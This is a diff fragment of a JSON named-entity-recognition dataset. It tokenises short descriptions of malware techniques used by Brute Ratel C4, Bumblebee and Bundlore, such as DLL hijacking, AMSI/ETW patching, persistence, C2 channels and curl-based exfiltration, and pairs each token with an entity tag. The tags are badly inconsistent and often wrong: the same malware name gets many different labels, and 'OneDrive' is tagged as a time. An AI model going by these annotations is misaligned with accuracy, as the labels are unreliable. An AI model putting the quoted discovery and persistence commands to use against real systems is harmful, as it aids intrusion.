+ "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Briba", + "installs", + "a", + "service", + "pointing", + "to", + "a", + "malicious", + "DLL", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "used", + "search", + "order", + "hijacking", + "to", + "load", + "a", + "malicious", + "payload", + "DLL", + "as", + "a", + "dependency", + "to", + "a", + "benign", + "application", + "packaged", + "in", + "the", + "same", + "ISO." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "loaded", + "a", + "malicious", + "DLL", + "by", + "spoofing", + "the", + "name", + "of", + "the", + "legitimate", + "Version.DLL", + "and", + "placing", + "it", + "in", + "the", + "same", + "folder", + "as", + "the", + "digitally-signed", + "Microsoft", + "binary", + "OneDriveUpdater.exe." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "DNS", + "over", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "the", + "ability", + "to", + "deobfuscate", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "LDAP", + "queries,", + "`net", + "group", + "\"Domain", + "Admins\"", + "/domain`", + "and", + "`net", + "user", + "/domain`", + "for", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "`net", + "group`", + "for", + "discovery", + "on", + "targeted", + "domains." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "LDAP", + "queries", + "and", + "`nltest", + "/domain_trusts`", + "for", + "domain", + "trust", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "call", + "and", + "dynamically", + "resolve", + "hashed", + "APIs." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "the", + "ability", + "to", + "hide", + "memory", + "artifacts", + "and", + "to", + "patch", + "Event", + "Tracing", + "for", + "Windows", + "(ETW)", + "and", + "the", + "Anti", + "Malware", + "Scan", + "Interface", + "(AMSI)." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "download", + "files", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "decode", + "Kerberos", + "5", + "tickets", + "and", + "convert", + "it", + "to", + "hashcat", + "format", + "for", + "subsequent", + "cracking." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "gained", + "execution", + "through", + "users", + "opening", + "malicious", + "documents." + ], + "ner_tags": [ + "B-Idus", + "I-Tool", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "used", + "Microsoft", + "Word", + "icons", + "to", + "hide", + "malicious", + "LNK", + "files." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "used", + "a", + "payload", + "file", + "named", + "OneDrive.update", + "to", + "appear", + "benign." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "call", + "multiple", + "Windows", + "APIs", + "for", + "execution,", + "to", + "share", + "memory,", + "and", + "defense", + "evasion." + ], + "ner_tags": [ + "B-SamFile", + "I-Tool", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "conduct", + "port", + "scanning", + "against", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "the", + "ability", + "to", + "use", + "TCP", + "for", + "external", + "C2." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "used", + "encrypted", + "payload", + "files", + "and", + "maintains", + "an", + "encrypted", + "configuration", + "structure", + "in", + "memory." + ], + "ner_tags": [ + "B-Idus", + "I-Tool", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "enumerate", + "all", + "processes", + "and", + "locate", + "specific", + "process", + "IDs", + "(PIDs)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "DNS", + "over", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "used", + "reflective", + "loading", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "the", + "ability", + "to", + "use", + "RPC", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "has", + "the", + "ability", + "to", + "use", + "SMB", + "to", + "pivot", + "in", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "take", + "screenshots", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "detect", + "EDR", + "userland", + "hooks." + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "create", + "Windows", + "system", + "services", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "I-Tool", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "call", + "`NtDelayExecution`", + "to", + "pause", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "HTTPS", + "and", + "HTTPS", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "legitimate", + "websites", + "for", + "external", + "C2", + "channels", + "including", + "Slack,", + "Discord,", + "and", + "MS", + "Teams." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "cmd.exe", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "WMI", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brute", + "Ratel", + "C4", + "can", + "use", + "WinRM", + "for", + "pivoting." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "compress", + "data", + "stolen", + "from", + "the", + "Registry", + "and", + "volume", + "shadow", + "copies", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "asynchronous", + "procedure", + "call", + "(APC)", + "injection", + "to", + "execute", + "commands", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "the", + "ability", + "to", + "bypass", + "UAC", + "to", + "deploy", + "post", + "exploitation", + "tools", + "with", + "elevated", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "a", + "COM", + "object", + "to", + "execute", + "queries", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "capture", + "and", + "compress", + "stolen", + "credentials", + "from", + "the", + "Registry", + "and", + "volume", + "shadow", + "copies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "search", + "for", + "tools", + "used", + "in", + "static", + "analysis." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "deobfuscate", + "C2", + "server", + "responses", + "and", + "unpack", + "its", + "code", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Bumblebee", + "loader", + "can", + "support", + "the", + "`Dij`", + "command", + "which", + "gives", + "it", + "the", + "ability", + "to", + "inject", + "DLLs", + "into", + "the", + "memory", + "of", + "other", + "processes." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "send", + "collected", + "data", + "in", + "JSON", + "format", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "backup", + "C2", + "servers", + "if", + "the", + "primary", + "server", + "fails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "uninstall", + "its", + "loader", + "through", + "the", + "use", + "of", + "a", + "`Sdl`", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "download", + "and", + "execute", + "additional", + "payloads", + "including", + "through", + "the", + "use", + "of", + "a", + "`Dex`", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "relied", + "upon", + "a", + "user", + "opening", + "an", + "ISO", + "file", + "to", + "enable", + "execution", + "of", + "malicious", + "shortcut", + "files", + "and", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "relied", + "upon", + "a", + "user", + "downloading", + "a", + "file", + "from", + "a", + "OneDrive", + "link", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "named", + "component", + "DLLs", + "\"RapportGP.dll\"", + "to", + "match", + "those", + "used", + "by", + "the", + "security", + "company", + "Trusteer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "B-Org" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "multiple", + "Native", + "APIs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "been", + "delivered", + "as", + "password-protected", + "zipped", + "ISO", + "files", + "and", + "used", + "control-flow-flattening", + "to", + "obfuscate", + "the", + "flow", + "of", + "functions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "`odbcconf.exe`", + "to", + "run", + "DLLs", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "identify", + "processes", + "associated", + "with", + "analytical", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "inject", + "code", + "into", + "multiple", + "processes", + "on", + "infected", + "endpoints." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "check", + "the", + "Registry", + "for", + "specific", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "used", + "`rundll32`", + "for", + "execution", + "of", + "the", + "loader", + "component." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "achieve", + "persistence", + "by", + "copying", + "its", + "DLL", + "to", + "a", + "subdirectory", + "of", + "%APPDATA%", + "and", + "creating", + "a", + "Visual", + "Basic", + "Script", + "that", + "will", + "load", + "the", + "DLL", + "via", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "identify", + "specific", + "analytical", + "tools", + "based", + "on", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "`LoadLibrary`", + "to", + "attempt", + "to", + "execute", + "GdiPlus.dll." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "gained", + "execution", + "through", + "luring", + "users", + "into", + "opening", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "been", + "spread", + "through", + "e-mail", + "campaigns", + "with", + "malicious", + "links." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "the", + "ability", + "to", + "base64", + "encode", + "C2", + "server", + "responses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "encrypt", + "C2", + "requests", + "and", + "responses", + "with", + "RC4" + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "the", + "ability", + "to", + "search", + "for", + "designated", + "file", + "paths", + "and", + "Registry", + "keys", + "that", + "indicate", + "a", + "virtualized", + "environment", + "from", + "multiple", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "enumerate", + "the", + "OS", + "version", + "and", + "domain", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "the", + "ability", + "to", + "identify", + "the", + "user", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "the", + "ability", + "to", + "set", + "a", + "hardcoded", + "and", + "randomized", + "sleep", + "interval." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "the", + "ability", + "to", + "perform", + "anti-virtualization", + "checks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "create", + "a", + "Visual", + "Basic", + "script", + "to", + "enable", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "has", + "been", + "downloaded", + "to", + "victim's", + "machines", + "from", + "OneDrive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "`cmd.exe`", + "to", + "drop", + "and", + "run", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bumblebee", + "can", + "use", + "WMI", + "to", + "gather", + "system", + "information", + "and", + "to", + "spawn", + "processes", + "for", + "code", + "injection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "use", + "AppleScript", + "to", + "inject", + "malicious", + "JavaScript", + "into", + "a", + "browser." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "install", + "malicious", + "browser", + "extensions", + "that", + "are", + "used", + "to", + "hijack", + "user", + "searches." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "used", + "<code>openssl</code>", + "to", + "decrypt", + "AES", + "encrypted", + "payload", + "data.", + "Bundlore", + "has", + "also", + "used", + "base64", + "and", + "RC4", + "with", + "a", + "hardcoded", + "key", + "to", + "deobfuscate", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "change", + "browser", + "security", + "settings", + "to", + "enable", + "extensions", + "to", + "be", + "installed.", + "Bundlore", + "uses", + "the", + "<code>pkill", + "cfprefsd</code>", + "command", + "to", + "prevent", + "users", + "from", + "inspecting", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "been", + "spread", + "through", + "malicious", + "advertisements", + "on", + "websites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "uses", + "the", + "<code>curl", + "-s", + "-L", + "-o</code>", + "command", + "to", + "exfiltrate", + "archived", + "data", + "to", + "a", + "URL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-Way", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "prompts", + "the", + "user", + "for", + "their", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "uses", + "the", + "<code>mktemp</code>", + "utility", + "to", + "make", + "unique", + "file", + "and", + "directory", + "names", + "for", + "payloads,", + "such", + "as", + "<code>TMP_DIR=`mktemp", + "-d", + "-t", + "x</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "download", + "and", + "execute", + "new", + "versions", + "of", + "itself." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "execute", + "JavaScript", + "by", + "injecting", + "it", + "into", + "the", + "victim's", + "browser." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "persist", + "via", + "a", + "LaunchAgent." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Bundlore", + "can", + "persist", + "via", + "a", + "LaunchDaemon." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Bundlore", + "changes", + "the", + "permissions", + "of", + "a", + "payload", + "using", + "the", + "command", + "<code>chmod", + "-R", + "755</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "attempted", + "to", + "get", + "users", + "to", + "execute", + "a", + "malicious", + ".app", + "file", + "that", + "looks", + "like", + "a", + "Flash", + "Player", + "update." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "disguised", + "a", + "malicious", + ".app", + "file", + "as", + "a", + "Flash", + "Player", + "update." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "obfuscated", + "data", + "with", + "base64,", + "AES,", + "RC4,", + "and", + "bz2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "used", + "the", + "<code>ps</code>", + "command", + "to", + "list", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "used", + "Python", + "scripts", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "creates", + "a", + "new", + "key", + "pair", + "with", + "<code>ssh-keygen</code>", + "and", + "drops", + "the", + "newly", + "created", + "user", + "key", + "in", + "<code>authorized_keys</code>", + "to", + "enable", + "remote", + "login." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bundlore", + "has", + "the", + "ability", + "to", + "enumerate", + "what", + "browser", + "is", + "being", + "used", + "as", + "well", + "as", + "version", + "information", + "for", + "Safari." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + 